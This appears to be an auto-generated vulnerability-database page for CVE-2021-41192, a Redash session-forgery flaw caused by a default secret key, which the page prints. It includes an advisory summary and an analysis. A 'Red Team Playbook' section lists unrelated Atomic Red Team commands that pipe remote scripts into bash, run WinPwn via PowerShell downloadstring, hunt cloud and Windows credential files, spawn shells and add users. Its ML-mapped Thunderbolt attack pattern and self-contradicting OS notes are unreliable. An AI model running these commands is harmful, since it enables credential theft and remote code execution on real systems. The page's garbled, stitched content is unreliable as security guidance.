CVE-2021-41192
Overview
This vulnerability is a session forgery issue caused by the use of hardcoded default secret keys in Redash versions 10.0.0 and earlier. The root cause is the failure to require explicit configuration of the REDASH_COOKIE_SECRET or REDASH_SECRET_KEY environment variables, leading to identical cryptographic secrets across multiple installations. The affected component is the session management mechanism responsible for signing and validating user sessions within the Redash application.
Vulnerability Description
Redash is a package for data visualization and sharing. If an admin sets up Redash versions 10.0.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. This issue only affects installations where the `REDASH_COOKIE_SECRET or REDASH_SECRET_KEY` environment variables have not been explicitly set. This issue does not affect users of the official Redash cloud images, Redash's Digital Ocean marketplace droplets, or the scripts in the `getredash/setup` repository. These instances automatically generate unique secret keys during installation. One can verify whether one's instance is affected by checking the value of the `REDASH_COOKIE_SECRET` environment variable. If it is `c292a0a3aa32397cdb050e233733900f`, should follow the steps to secure the instance, outlined in the GitHub Security Advisory.
Impact
An attacker with network access to a vulnerable Redash instance can create forged session cookies to impersonate legitimate users, including administrators, without needing to authenticate. This enables unauthorized access to sensitive data visualization and sharing features. The attack requires knowledge of the default secret and access to the instance but does not require user interaction. According to the CVSS vector (AV:N/AC:L/PR:L/UI:N), the attacker needs limited privileges but no user interaction, enabling potential lateral movement and data exposure within affected environments.
Solution
Administrators of self-hosted Redash versions 10.0.0 and earlier must explicitly set unique values for the REDASH_COOKIE_SECRET and REDASH_SECRET_KEY environment variables to secure their instances. The official GitHub Security Advisory GHSA-g8xr-f424-h2rv provides detailed instructions for verifying and updating these secrets. Users of official Redash cloud images or Digital Ocean marketplace droplets are not affected as these generate unique secrets automatically. Refer to the advisory at https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv for remediation steps and patch details.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with Redash arises from improper handling of critical environment variables, specifically the `REDASH_COOKIE_SECRET` and `REDASH_SECRET_KEY`. When these variables are not explicitly set during installation, the application defaults to a common value that is identical across all installations. This design flaw creates a significant security risk, as it allows an attacker to forge session tokens. By exploiting this vulnerability, an attacker can impersonate legitimate users, gaining unauthorized access to sensitive data visualizations and shared reports. The fundamental issue lies in the reliance on default values, which are predictable and easily exploitable.
Attack vectors for this vulnerability are relatively straightforward. An attacker who identifies an instance of Redash that has not been properly secured can leverage the known default secret keys to forge session cookies. This can be accomplished through various means, such as network sniffing, social engineering, or brute force attacks on the session management system. Once the attacker successfully forges a session, they can perform actions as if they were a legitimate user, including accessing confidential data, modifying visualizations, or even deleting critical information. The simplicity of the attack method, combined with the potential for significant data exposure, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability can be profound. Organizations that utilize Redash for data visualization and sharing often handle sensitive business intelligence data. Unauthorized access to this data can lead to data breaches, loss of intellectual property, and reputational damage. Additionally, the financial implications of such breaches can be severe, including regulatory fines, legal costs, and loss of customer trust. The business risk escalates further when considering that many organizations may not be aware of the default settings or the necessity to configure these environment variables explicitly, leaving them vulnerable to exploitation.
To detect and mitigate this vulnerability, organizations must first conduct a thorough assessment of their Redash installations. This includes checking the values of the `REDASH_COOKIE_SECRET` and `REDASH_SECRET_KEY` environment variables. If the values match the known default, immediate action is required to secure the instance. The recommended mitigation strategy involves generating unique, strong secret keys for both environment variables and updating the configuration accordingly. Furthermore, organizations should implement regular security audits and vulnerability assessments to ensure that all components of their data visualization infrastructure are secure. Educating administrators about the importance of these configurations can also help prevent similar vulnerabilities in the future.
In conclusion, the vulnerability in Redash highlights critical weaknesses in session management and environment variable handling. The potential for session forgery poses a significant threat to organizations relying on this tool for data visualization. By understanding the technical details, attack vectors, and real-world implications, cybersecurity professionals can better prepare to defend against such vulnerabilities. Implementing robust detection and mitigation strategies is essential to safeguarding sensitive data and maintaining the integrity of business operations.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Redash | Redash | All |
cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-41192 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214 |
| ian.sh |
GitHub CVE
x_refsource_MISC
|
https://ian.sh/redash |